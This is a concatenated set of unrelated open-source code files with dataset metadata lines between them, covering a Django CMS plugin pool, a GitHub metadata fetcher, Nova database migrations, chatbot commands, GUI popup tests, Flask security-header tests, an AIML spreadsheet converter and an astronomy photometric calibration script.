plugins = (plugin for plugin in plugins if plugin.__name__ in allowed_plugins)
if excluded_plugins:
# Check that plugins are not in the list of the excluded ones
plugins = (plugin for plugin in plugins if plugin.__name__ not in excluded_plugins)
if placeholder:
# Filters out any plugin that requires a parent or has set parent classes
plugins = (plugin for plugin in plugins
if not plugin.requires_parent_plugin(placeholder, page))
return sorted(plugins, key=attrgetter('module'))
def get_text_enabled_plugins(self, placeholder, page):
plugins = set(self.get_all_plugins(placeholder, page))
plugins.update(self.get_all_plugins(placeholder, page, 'text_only_plugins'))
return sorted((p for p in plugins if p.text_enabled),
key=attrgetter('module', 'name'))
def get_plugin(self, name):
"""
Retrieve a plugin from the cache.
"""
self.discover_plugins()
return self.plugins[name]
def get_patterns(self):
self.discover_plugins()
# We want untranslated name of the plugin for its slug so we deactivate translation
lang = get_language()
deactivate_all()
try:
url_patterns = []
for plugin in self.registered_plugins:
p = plugin()
slug = slugify(force_text(normalize_name(p.__class__.__name__)))
url_patterns += [
re_path(r'^plugin/%s/' % (slug,), include(p.plugin_urls)),
]
finally:
# Reactivate translation
activate(lang)
return url_patterns
def get_system_plugins(self):
self.discover_plugins()
return [plugin.__name__ for plugin in self.plugins.values() if plugin.system]
@cached_property
def registered_plugins(self):
return self.get_all_plugins()
@cached_property
def plugins_with_extra_menu(self):
plugin_classes = [cls for cls in self.registered_plugins
if cls._has_extra_plugin_menu_items]
return plugin_classes
@cached_property
def plugins_with_extra_placeholder_menu(self):
plugin_classes = [cls for cls in self.registered_plugins
if cls._has_extra_placeholder_menu_items]
return plugin_classes
plugin_pool = PluginPool()
| bsd-3-clause | 4,728,667,927,602,387,000 | 36.887446 | 106 | 0.573812 | false |
QLGu/djangopackages | package/repos/github.py | 2 | 2521 | from time import sleep
from django.conf import settings
from django.utils import timezone
from github3 import GitHub, login
import requests
from base_handler import BaseHandler
from package.utils import uniquer
class GitHubHandler(BaseHandler):
title = "Github"
url_regex = '(http|https|git)://github.com/'
url = 'https://github.com'
repo_regex = r'(?:http|https|git)://github.com/[^/]*/([^/]*)/{0,1}'
slug_regex = repo_regex
def __init__(self):
if settings.GITHUB_TOKEN:
self.github = login(token=settings.GITHUB_TOKEN)
else:
self.github = GitHub()
def manage_ratelimit(self):
while self.github.ratelimit_remaining < 10:
sleep(1)
def _get_repo(self, package):
repo_name = package.repo_name()
if repo_name.endswith("/"):
repo_name = repo_name[:-1]
try:
username, repo_name = package.repo_name().split('/')
except ValueError:
return None
return self.github.repository(username, repo_name)
def fetch_metadata(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
package.repo_watchers = repo.watchers
package.repo_forks = repo.forks
package.repo_description = repo.description
contributors = []
for contributor in repo.iter_contributors():
contributors.append(contributor.login)
self.manage_ratelimit()
if contributors:
package.participants = ','.join(uniquer(contributors))
return package
def fetch_commits(self, package):
self.manage_ratelimit()
repo = self._get_repo(package)
if repo is None:
return package
from package.models import Commit # Added here to avoid circular imports
for commit in repo.iter_commits():
self.manage_ratelimit()
try:
commit_record, created = Commit.objects.get_or_create(
package=package,
commit_date=commit.commit.committer['date']
)
if not created:
break
except Commit.MultipleObjectsReturned:
continue
# If the commit record already exists, it means we are at the end of the
# list we want to import
package.save()
return package
repo_handler = GitHubHandler()
| mit | 5,148,200,768,411,809,000 | 27.977011 | 84 | 0.589052 | false |
gyang/nova | nova/db/sqlalchemy/migration.py | 1 | 4780 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import distutils.version as dist_version
import os
import sys
from nova.db.sqlalchemy.session import get_engine
from nova import exception
from nova import flags
import sqlalchemy
import migrate
from migrate.versioning import util as migrate_util
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
_REPOSITORY = None
def db_sync(version=None):
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.Error(_("version should be an integer"))
current_version = db_version()
repository = _find_migrate_repo()
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version():
repository = _find_migrate_repo()
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
try:
for table in ('auth_tokens', 'zones', 'export_devices',
'fixed_ips', 'floating_ips', 'instances',
'key_pairs', 'networks', 'projects', 'quotas',
'security_group_instance_association',
'security_group_rules', 'security_groups',
'services', 'migrations',
'users', 'user_project_association',
'user_project_role_association',
'user_role_association',
'virtual_storage_arrays',
'volumes', 'volume_metadata',
'volume_types', 'volume_type_extra_specs'):
assert table in meta.tables
return db_version_control(1)
except AssertionError:
return db_version_control(0)
def db_version_control(version=None):
repository = _find_migrate_repo()
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
global _REPOSITORY
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
if _REPOSITORY is None:
_REPOSITORY = Repository(path)
return _REPOSITORY
| apache-2.0 | 6,008,023,316,838,071,000 | 34.93985 | 78 | 0.64477 | false |
Mego/DataBot | SE-Chatbot/botbuiltins/utils.py | 1 | 4260 | from Module import Command
from datetime import datetime
from requests import HTTPError
import re
import os
from ChatExchange3.chatexchange3.messages import Message
def command_alive(cmd, bot, args, msg, event):
return "Yes, I'm alive."
def command_utc(cmd, bot, args, msg, event):
return datetime.utcnow().ctime()
def command_listcommands(cmd, bot, args, msg, event):
if len(args) == 0:
return "Commands:%s%s" % (os.linesep, ', '.join([command.name for command in bot.modules.list_commands()]))
elif len(args) == 1:
module = bot.modules.find_module_by_name(args[0])
if module is None:
return "That module does not exist, or it is disabled."
cmds = module.list_commands()
if len(cmds) == 0:
return "No commands found in `%s`." % args[0]
return "Commands in `%s`:%s%s" % (args[0], os.linesep, ', '.join([command.name for command in cmds]))
else:
return "0 or 1 argument(s) expected."
#def parse_cat_command(cmd):
# if cmd.startswith("cat "):
# return [cmd[4:]]
# else:
# return False
def command_help(cmd, bot, args, msg, event):
if len(args) == 0:
return "I'm $BOT_NAME, $OWNER_NAME's chatbot. You can find the source code [on GitHub]($GITHUB). You can get a list of all commands by running `$PREFIXlistcommands`, or you can run `$PREFIXhelp command` to learn more about a specific command."
return bot.modules.get_help(args[0]) or "The command you want to look up does not exist."
#def command_cat(cmd, bot, args, msg, event):
# return args[0]
def command_read(cmd, bot, args, msg, event):
if len(args) == 0:
return "No message id/link supplied."
else:
message = []
for msg_id in args:
if msg_id.isdigit():
m_id = int(msg_id)
elif msg_id.split("#")[-1].isdigit():
m_id = int(msg_id.split("#")[-1])
elif msg_id.split("/")[-1].isdigit():
m_id = int(msg_id.split("/")[-1])
else:
return msg_id + " is not a valid message id/link."
try:
message += [re.sub(r'^:[0-9]+ ', '', Message(m_id, bot.client).content_source)]
except HTTPError:
return msg_id + ": message not found."
return ' '.join(message)
#def command_getcurrentusers(cmd, bot, args, msg, event):
# try:
# users = bot.room.get_current_user_names()
# except HTTPError:
# return "HTTPError when executing the command; please try again."
# except ConnectionError:
# return "ConnectionError when executing the command; please try again."
# users = [x.encode('ascii', errors='replace').decode('unicode_escape') for x in users]
# if len(args) > 0 and args[0] == "pingformat":
# users = [x.replace(" ", "") for x in users]
# return " ".join(users)
# return ", ".join(users)
#def command_ping(cmd, bot, args, msg, event):
# if len(args) == 0:
# return "No arguments supplied"
# else:
# return " ".join(["@" + arg for arg in args])
commands = [Command('alive', command_alive, "A command to see whether the bot is there. Syntax: `$PREFIXalive`", False, False),
Command('utc', command_utc, "Shows the current UTC time. Syntax: `$PREFIXutc`", False, False),
Command('listcommands', command_listcommands, "Returns a list of all commands. Syntax: `$PREFIXlistcommands`", False, False),
Command('help', command_help, "Shows information about the chat bot, or about a specific command. Syntax: `$PREFIXhelp [ command ]`", False, False),
#Command('cat', command_cat, "Repeats what you said back at you. Syntax: `$PREFIXcat something`", False, False, parse_cat_command, None, None, None),
Command('read', command_read, "Reads a post to you. Syntax: `$PREFIXread [ message_id ] ...`", False, False),
#Command('getcurrentusers', command_getcurrentusers, "Shows the current users of a room. Syntax: `$PREFIXgetcurrentusers`", False, False),
#Command('ping', command_ping, "Pings a list of users for you. Syntax: `$PREFIXping user [...]`", False, False, None, None, None, None)
]
module_name = "utils"
| mit | 6,625,686,474,243,252,000 | 42.469388 | 251 | 0.609624 | false |
qspin/qtaste | demo/TestSuites/PlayBack/PopupControl/TestScript.py | 1 | 3497 | # coding=utf-8
##
# PopupControl.
# <p>
# Description of the test.
#
# @data INSTANCE_ID [String] instance id
##
from qtaste import *
import time
javaguiMI = testAPI.getJavaGUI(INSTANCE_ID=testData.getValue("JAVAGUI_INSTANCE_NAME"))
subtitler = testAPI.getSubtitler()
def displayFirstPopup():
"""
@step Click on the button to create the first popup
@expected a popup exist
"""
javaguiMI.selectTabId("TABBED_PANE", "DIALOG_PANEL")
subtitler.setSubtitle("Click on the <span style=\"color:red;\">Start</span> button", 1.5)
javaguiMI.clickOnButton("START_BUTTON")
time.sleep(1)
if javaguiMI.isPopupDisplayed() == False:
testAPI.stopTest(Status.FAIL, "No popup created.")
def setPopupValue():
"""
@step Set the popup value ant click on OK
@expected If the value is numeric another popup is opened ELSE no opened popup.
"""
popupValue = testData.getValue("POPUP_VALUE");
subtitler.setSubtitle("Set the value '" + popupValue +"' and click on the <span style=\"color:red;\">OK</span> button", 1.5)
javaguiMI.setPopupValue(popupValue)
javaguiMI.clickOnPopupButton("OK");
time.sleep(1)
shouldHavePopup = testData.getBooleanValue("IS_POPUP_VALUE_NUMERIC");
if javaguiMI.isPopupDisplayed() != shouldHavePopup:
if shouldHavePopup:
testAPI.stopTest(Status.FAIL, "Popup should have been created.")
else:
testAPI.stopTest(Status.FAIL, "Popup should not have been created.")
def valueValidation():
"""
@step Check the displayed message and click on OK
@expected the message contains the correct value.
"""
popupValue = testData.getValue("POPUP_VALUE");
expectedMessage = "Are you sure you want to display " + popupValue + " popup(s)?"
subtitler.setSubtitle("Check the popup message is '" + expectedMessage + "'")
time.sleep(2)
currentMessage = javaguiMI.getPopupText()
if expectedMessage != currentMessage:
testAPI.stopTest(Status.FAIL, "The message is not the expected one. get '" + currentMessage + "' but expects '" + expectedMessage +"'.")
if testData.getBooleanValue("CONFIRM"):
subtitler.setSubtitle("Click on the <span style=\"color:red;\">Yes</span> button")
time.sleep(1)
javaguiMI.clickOnPopupButton("Yes")
else:
subtitler.setSubtitle("Click on the <span style=\"color:red;\">No</span> button", 1.5)
time.sleep(1)
javaguiMI.clickOnPopupButton("No")
def countPopupAndClose():
"""
@step Check the number of displayed popup and close them.
@expected there is/are the @POPUP_VALUE popup().
"""
if testData.getBooleanValue("CONFIRM"):
popupValue = testData.getIntValue("POPUP_VALUE")
else:
popupValue = 0
time.sleep(1)
subtitler.setSubtitle("Check the number of opened popup")
time.sleep(1)
current = len(javaguiMI.getAllPopupText())
if current != popupValue:
testAPI.stopTest(Status.FAIL, str(popupValue) + " popup(s) expected but only " + str(current) + " popup(s) displayed!")
i = 0
while len(javaguiMI.getAllPopupText()) > 0:
subtitler.setSubtitle("Click on the <span style=\"color:red;\">OK</span> button", 1.5)
javaguiMI.clickOnPopupButton("OK")
time.sleep(1)
i += 1
doStep(displayFirstPopup)
doStep(setPopupValue)
if testData.getBooleanValue("IS_POPUP_VALUE_NUMERIC"):
doStep(valueValidation)
countPopupAndClose()
| lgpl-3.0 | -772,310,992,440,049,000 | 33.623762 | 144 | 0.668573 | false |
ONSdigital/ras-frontstage | tests/integration/views/surveys/test_download_survey.py | 1 | 4001 | import json
import unittest
from unittest.mock import patch
import requests_mock
from flask import request
from frontstage import app
from tests.integration.mocked_services import (
business_party,
case,
collection_instrument_seft,
encoded_jwt_token,
survey,
url_banner_api,
)
@requests_mock.mock()
class TestDownloadSurvey(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
self.app.set_cookie("localhost", "authorization", "session_key")
self.headers = {
"Authorization": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoicmluZ3JhbUBub3d3aGVyZS5jb20iLCJ1c2VyX3Njb3BlcyI6WyJjaS5yZWFkIiwiY2kud3JpdGUiXX0.se0BJtNksVtk14aqjp7SvnXzRbEKoqXb8Q5U9VVdy54" # NOQA
}
self.patcher = patch("redis.StrictRedis.get", return_value=encoded_jwt_token)
self.patcher.start()
def tearDown(self):
self.patcher.stop()
@patch("frontstage.controllers.collection_instrument_controller.download_collection_instrument")
@patch("frontstage.controllers.party_controller.is_respondent_enrolled")
@patch("frontstage.controllers.case_controller.get_case_by_case_id")
def test_download_survey_success(self, mock_request, get_case_by_id, _, download_collection_instrument):
mock_request.get(url_banner_api, status_code=404)
str = json.dumps(collection_instrument_seft)
binary = " ".join(format(ord(letter), "b") for letter in str)
get_case_by_id.return_value = case
headers = {"Content-type": "application/json", "Content-Length": "5962"}
download_collection_instrument.return_value = binary, headers
response = self.app.get(
f'/surveys/download-survey?case_id={case["id"]}&business_party_id={business_party["id"]}'
f'&survey_short_name={survey["shortName"]}'
)
self.assertEqual(response.status_code, 200)
def test_enforces_secure_headers(self, mock_request):
mock_request.get(url_banner_api, status_code=404)
with app.test_client() as client:
headers = client.get(
"/", headers={"X-Forwarded-Proto": "https"} # set protocol so that talisman sets HSTS headers
).headers
self.assertEqual("no-cache, no-store, must-revalidate", headers["Cache-Control"])
self.assertEqual("no-cache", headers["Pragma"])
self.assertEqual("max-age=31536000; includeSubDomains", headers["Strict-Transport-Security"])
self.assertEqual("DENY", headers["X-Frame-Options"])
self.assertEqual("1; mode=block", headers["X-Xss-Protection"])
self.assertEqual("nosniff", headers["X-Content-Type-Options"])
csp_policy_parts = headers["Content-Security-Policy"].split("; ")
self.assertIn("default-src 'self' https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn("font-src 'self' data: https://fonts.gstatic.com https://cdn.ons.gov.uk", csp_policy_parts)
self.assertIn(
"script-src 'self' https://www.googletagmanager.com https://cdn.ons.gov.uk 'nonce-{}'".format(
request.csp_nonce
),
csp_policy_parts,
)
# TODO: fix assertion error
# self.assertIn(
# "connect-src 'self' https://www.googletagmanager.com https://tagmanager.google.com https://cdn.ons.gov.uk "
# 'http://localhost:8082 ws://localhost:8082', csp_policy_parts)
self.assertIn(
"img-src 'self' data: https://www.gstatic.com https://www.google-analytics.com "
"https://www.googletagmanager.com https://ssl.gstatic.com https://cdn.ons.gov.uk",
csp_policy_parts,
)
self.assertIn(
"style-src 'self' https://cdn.ons.gov.uk 'unsafe-inline' https://tagmanager.google.com https://fonts.googleapis.com",
csp_policy_parts,
)
| mit | 3,429,505,770,575,708,700 | 44.988506 | 215 | 0.63859 | false |
hansonrobotics/chatbot | src/chatbot/server/gsheet_chatter.py | 1 | 8513 | import os
import sys
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(CWD, '..'))
import aiml
import urllib
import csv
import logging
import glob
from csvUtils import generateAimlFromLongCSV, generateAimlFromSimpleCSV
import xml.etree.ElementTree as ET
logger = logging.getLogger('hr.chatbot.gsheet_chatter')
xmlns = '{http://www.w3.org/2005/Atom}'
def getWorkSheets(skey, dirname='.'):
urlwks = "https://spreadsheets.google.com/feeds/worksheets/<KEY>/public/full"
urlwks = urlwks.replace("<KEY>", skey)
wksData = urllib.urlopen(urlwks).read()
tree = ET.fromstring(wksData)
author = tree.find(xmlns + 'author')
name = author.find(xmlns + 'name').text
email = author.find(xmlns + 'email').text
aiml_files, csv_files = [], []
if not os.path.isdir(dirname):
os.makedirs(dirname)
for entry in tree.findall('{}entry'.format(xmlns)):
aimlFileData = None
csvData = None
title = None
for item in entry.iter():
if item.tag == xmlns + 'link' and item.attrib.get('type') == 'text/csv':
pagelink = item.attrib.get('href')
#pagelink = pagelink.replace('format=csv', 'format=tsv', )
csvData = loadSheetViaURL(pagelink)
aimlFileData = generateAimlFromCSV(csvData)
if item.tag == xmlns + 'title':
title = item.text
filename = os.path.join(
dirname, '{}_{}.aiml'.format(skey, title))
csv_fname = os.path.join(
dirname, '{}_{}.csv'.format(skey, title))
if title == 'question': # skip "question" sheet
continue
if csvData is not None:
with open(csv_fname, 'w') as f:
f.write(csvData)
csv_files.append(csv_fname)
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
aiml_files.append(filename)
return aiml_files, csv_files
# http://stackoverflow.com/questions/11290337/how-to-convert-google-spreadsheets-worksheet-string-id-to-integer-index-gid
def to_gid(worksheet_id):
return int(worksheet_id, 36) ^ 31578
def loadSheet(skey, page):
#// REPLACE THIS WITH YOUR URL
logger.debug("PAGE:" + str(page))
logger.debug("GID :" + str(to_gid(str(page))))
urlcsv = "https://docs.google.com/spreadsheets/d/<KEY>/export?format=csv&id=<KEY>&gid=" + \
str(page) # +str(to_gid(str(page)))
urlcsv = urlcsv.replace("<KEY>", skey)
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def loadSheetViaURL(urlcsv):
csvData = urllib.urlopen(urlcsv).read()
if ("DOCTYPE html" in csvData):
return ""
logger.debug("URL : " + urlcsv)
return csvData
def generateAimlFromCSV(csvData, delimiter=','):
lines = csvData.splitlines()
if (len(lines) == 0):
return ""
header = lines[0]
aimlFile = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
aimlFile += '<aiml>\n'
reader = csv.DictReader(lines, delimiter=delimiter)
for row in reader:
logger.debug(row)
slots = {}
slots['PATTERN'] = "*"
slots['THAT'] = "*"
slots['TEMPLATE'] = ""
slots['TOPIC'] = "*"
slots['REDUCE_TO'] = ""
category = " <category>\n <pattern>XPATTERN</pattern>\n <that>XTHAT</that>\n <template>XTEMPLATEXREDUCE</template>\n </category>\n"
if (('PATTERN' in row) and (row['PATTERN'] != "")):
slots['PATTERN'] = row['PATTERN'].upper()
if (('THAT' in row) and (row['THAT'] != "")):
slots['THAT'] = row['THAT']
if (('TEMPLATE' in row) and (row['TEMPLATE'] != "")):
slots['TEMPLATE'] = row['TEMPLATE'].replace("#Comma", ",")
if (('TOPIC' in row) and (row['TOPIC'] != "")):
slots['TOPIC'] = row['TOPIC']
if (('REDUCE_TO' in row) and (row['REDUCE_TO'] != "")):
slots['REDUCE_TO'] = "<srai>" + row['REDUCE_TO'] + "</srai>"
category = category.replace("XPATTERN", slots['PATTERN'])
category = category.replace("XTHAT", slots['THAT'])
category = category.replace("XTEMPLATE", slots['TEMPLATE'])
category = category.replace("XTOPIC", slots['TOPIC'])
category = category.replace("XREDUCE", slots['REDUCE_TO'])
aimlFile += category
aimlFile += "</aiml>"
return aimlFile
def readAndLoadSheets(sheetList, engine):
for sheetKey in sheetList:
aiml_files, _ = getWorkSheets(sheetKey)
for aiml_file in aiml_files:
engine.learn(aiml_file)
# for page in range(0,3):
# csvDat = loadSheet(sheetKey,int(page))
# aimlFileData = generateAimlFromCSV(csvDat)
# if (len(aimlFileData)==0): continue
# filename = sheetKey+"_"+str(page) +".aiml"
# target = open(filename, 'w')
# target.truncate()
# target.write(aimlFileData)
# target.close()
# engine.learn(filename)
# The Kernel object is the public interface to
# the AIML interpreter.
def get_csv_version(csv_file):
# Guessing
with open(csv_file) as f:
header = f.readline().strip()
if sorted(header.split(',')) == sorted(
['Human_says', 'Meaning', 'Robot_says']):
return "3"
elif sorted(header.split(',')) == sorted(
['Type', 'Pattern', 'That', 'Template', 'Source', 'Think', 'Topic']):
return "2"
else:
return "1"
def batch_csv2aiml(csv_dir, aiml_dir, csv_version=None):
"""Convert all the csv files in the csv_dir to aiml files.
csv_version:
1: PATTERN,THAT,TOPIC,TEMPLATE,REDUCE_TO
2: Type,Pattern,That,Template,Source,Think
3: Human_says,Meaning,Robot_says
"""
if not os.path.isdir(aiml_dir):
os.makedirs(aiml_dir)
aiml_files = []
csv_files = []
for csv_file in glob.glob('{}/*.csv'.format(csv_dir)):
filename = os.path.basename(csv_file)
filename = os.path.splitext(filename)[0] + '.aiml'
filename = os.path.join(aiml_dir, filename)
aimlFileData = None
with open(csv_file) as f:
if csv_version is None:
csv_version = get_csv_version(csv_file)
if csv_version == '1':
csvData = f.read()
aimlFileData = generateAimlFromCSV(csvData, ',')
elif csv_version == '2':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromLongCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
elif csv_version == '3':
csvData = csv.DictReader(f)
try:
aimlFileData = generateAimlFromSimpleCSV(csvData)
except Exception as ex:
raise Exception('Generate aiml from csv {} error {}'.format(
os.path.basename(csv_file), ex))
if aimlFileData is not None:
with open(filename, 'w') as f:
f.write(aimlFileData)
logger.info("Convert {} to {}".format(csv_file, filename))
aiml_files.append(filename)
csv_files.append(csv_file)
return aiml_files, csv_files
if __name__ == '__main__':
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
k = aiml.Kernel()
# **************** CHANGE TO GOOGLE SHEET KEY HERE ***********************
sheetList = {"1Tbro_Kjbby162Rms0GpQswoqhavXOoRe85HVRyEB1NU"}
readAndLoadSheets(sheetList, k)
#csvDat = loadSheet(sheetKey)
# print "CSVDAT"
# print csvDat
#aimlFile = generateAimlFromCSV(csvDat)
# print aimlFile
# Use the 'learn' method to load the contents
# of an AIML file into the Kernel.
# k.learn("std-startup.xml")
# Use the 'respond' method to compute the response
# to a user's input string. respond() returns
# the interpreter's response, which in this case
# we ignore.
# k.respond("load aiml b")
# Loop forever, reading user input from the command
# line and printing responses.
while True:
userin = raw_input("> ")
print "raw response:" + k.respond(userin)
| mit | 3,803,464,178,213,337,600 | 34.619247 | 142 | 0.573828 | false |
BradleyMoore/Game_of_Life | app/life.py | 1 | 2134 | from collections import Counter
import pygame
from constants import BOX, HEIGHT, WIDTH, SCREEN
class Cell(object):
def __init__(self, pos):
self.color = (255,0,0)
self.neighbors = 0
self.neighbor_list = []
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def draw(self):
if self.x < 0 or self.x > WIDTH:
pass
elif self.y < 0 or self.y > HEIGHT:
pass
else:
pygame.draw.rect(SCREEN, self.color, (self.x*BOX, self.y*BOX, BOX, BOX))
def list_neighbors(self):
self.neighbor_list = []
for x in xrange(self.x-1, self.x+2):
for y in xrange(self.y-1, self.y+2):
self.neighbor_list.append((x,y))
self.neighbor_list.remove(self.pos)
return self.neighbor_list
class Pattern(object):
def __init__(self, name, pos):
self.name = name
self.pos = pos
self.x = pos[0]
self.y = pos[1]
def create_pattern(self):
from patterns import patterns
pattern = patterns[self.name]
coordinates = []
for y in xrange(len(pattern)):
for x in xrange(len(pattern[y])):
if pattern[y][x] == 1:
coordinates.append((self.x+x, self.y+y))
return coordinates
def create_life(life, neighbors):
from game import TO_BE_BORN, TO_LIVE
new_life = []
# turn neighbor positions into a list of tuples
neighbor_dict = Counter(neighbors)
neighbor_list = neighbor_dict.items()
life_pos = []
if life != None:
for cell in life:
life_pos.append(cell.pos)
for pos, count in neighbor_list:
# give birth to cells
if count in TO_BE_BORN and pos not in life_pos:
new_life.append(pos)
# cells staying alive
if count in TO_LIVE and pos in life_pos:
new_life.append(pos)
return new_life
def get_neighbors(life):
neighbors = []
if life != None:
for cell in life:
neighbors.extend(cell.list_neighbors())
return neighbors
| mit | 5,229,378,662,050,004,000 | 21.946237 | 84 | 0.556232 | false |
deapplegate/wtgpipeline | photo_illum.py | 1 | 18300 | #!/usr/bin/env python
# Python module for photometric calibration.
# It needs the Python modules ppgplot and
# mpfit to be installed.
# 03.03.2005 Fixed a serious bug in the rejection loop. Instead
# of using the remaining points we always used all points
# and rejected points until the original fit matched the data
# 15.02.2005 Fixed the range of the y-axes in the plots to more
# sensible values
# 14.02.2005 Fixed a bug when more paramters were fitted than
# data points were present
# We now rescale points to the airmass/color at which
# they are plotted (zero)
# Check that label is set
# 10.12.2004 Now takes a new argument "label" to be
# used as axis label in the color plot
import copy
import getopt
import string
import sys
import mpfit
import Numeric
from ppgplot import *
import BonnLogger
def illum_funct(p, fjac=None, X=None, Y=None):
[A,B,C,D,E,F] = p
model = A*X**2 + B*Y**2 + C*X*Y + D*X + E*Y + F
status = 0
return([status, (model-y)/err])
def phot_funct_2(p, fjac=None, y=None, err=None):
model = p[0]
status = 0
return([status, (model-y)/err])
def phot_funct_1(p, fjac=None, color=None, y=None, err=None):
model = p[0] + p[1]*color
status = 0
return([status, (model-y)/err])
def phot_funct_0(p, fjac=None, airmass=None, color1=None, color2=None, y=None, err=None):
model = p[0] + p[1]*color1 + p[2]*color2
status = 0
return([status, (model-y)/err])
def readInput(file):
f = open(file, "r")
instMagList = []
stdMagList = []
magErrList = []
colList = []
airmassList = []
for line in f.readlines():
instMag, stdMag, col, airmass, instMagErr, stdMagErr = string.split(line)
magErr = (float(instMagErr)**2. + float(stdMagErr)**2.)**0.5
magErrList.append(magErr)
instMagList.append(float(instMag))
stdMagList.append(float(stdMag))
colList.append(float(col))
airmassList.append(float(airmass))
f.close()
instMag = Numeric.array(instMagList)
stdMag = Numeric.array(stdMagList)
data = stdMag - instMag
airmass = Numeric.array(airmassList)
color = Numeric.array(colList)
magErr = Numeric.array(magErrList)
return data, airmass, color, magErr
#def photCalib(data_save, airmass_save, color_save, err_save, p, sigmareject, maxSigIter=50):
def photCalib(dictionary, p, sigmareject, maxSigIter=50):
save_len = len(data_save)
parinfos = [[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0, "limited": [0,1], "limits": [-99, 0]},{"value": p[2], "fixed": 0}],[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0}],[{"value": p[0], "fixed": 0}]]
phot_functs = [phot_funct_0, phot_funct_1, phot_funct_2]
solutions = []
for fit_type in [0,1,2]:
airmass = copy.copy(airmass_save)
color = copy.copy(color_save)
data_tmp = copy.copy(data_save)
err = copy.copy(err_save)
#first apply coefficients we are holding fixed
data = copy.copy(data_tmp)
if fit_type == 1:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i]
if fit_type == 2:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i] - p[2]*color[i]
print data_tmp[0], data[0]
data_rec = copy.copy(data)
parinfo = parinfos[fit_type]
#for j in range(len(parinfo)):
#if j in fixedList:
# print "Element", j, "is fixed at", p[j]
# parinfo[j]["fixed"] = 1
#else:
# parinfo[j]["fixed"] = 0
for i in range(maxSigIter):
old_len = len(data)
fas = [{"airmass": airmass,"color": color, "y": data, "err": err},{"color": color,"y": data, "err": err}, {"y": data, "err": err}]
fa = fas[fit_type]
phot_funct = phot_functs[fit_type]
m = mpfit.mpfit(phot_funct, functkw=fa,
parinfo=parinfo,
maxiter=1000, quiet=1)
print m.covar, m.params, m.perror
if (m.status <= 0):
print 'error message = ', m.errmsg
condition = Numeric.zeros(len(data))
break
#airmass = copy.copy(airmass_save)
#color = copy.copy(color_save)
#data = copy.copy(data_save)
#err = copy.copy(err_save)
# Compute a 3 sigma rejection criterion
#condition = preFilter(m.params, data_save, data,
# airmass_save, airmass,
# color_save, color)
params = [0,0,0]
perror = [0,0,0]
print m.params,m.perror, m.covar
if fit_type == 0:
params = copy.copy(m.params)
perror = copy.copy(m.perror)
if fit_type == 1:
params[0] = m.params[0]
params[2] = m.params[1]
params[1] = p[1]
perror[0] = m.perror[0]
perror[2] = m.perror[1]
if fit_type == 2:
params[0] = m.params[0]
params[1] = p[1]
params[2] = p[2]
perror[0] = m.perror[0]
# Compute a 3 sigma rejection criterion
print params, data_rec[0], data[0]
condition, redchisq = SigmaCond(params, data_save, data,
airmass_save, airmass,
color_save, color, err_save, err, sigmareject)
print redchisq
# Keep everything (from the full data set!) that is within
# the 3 sigma criterion
#data_sig = Numeric.compress(condition, data_save)
data = Numeric.compress(condition, data_rec)
airmass = Numeric.compress(condition, airmass_save)
color = Numeric.compress(condition, color_save)
err = Numeric.compress(condition, err_save)
new_len = len(data)
if float(new_len)/float(save_len) < 0.5:
print "Rejected more than 50% of all measurements."
print "Aborting this fit."
break
# No change
if new_len == old_len:
print "Converged! (%d iterations)" % (i+1, )
print "Kept %d/%d stars." % (new_len, save_len)
break
print params, perror, condition
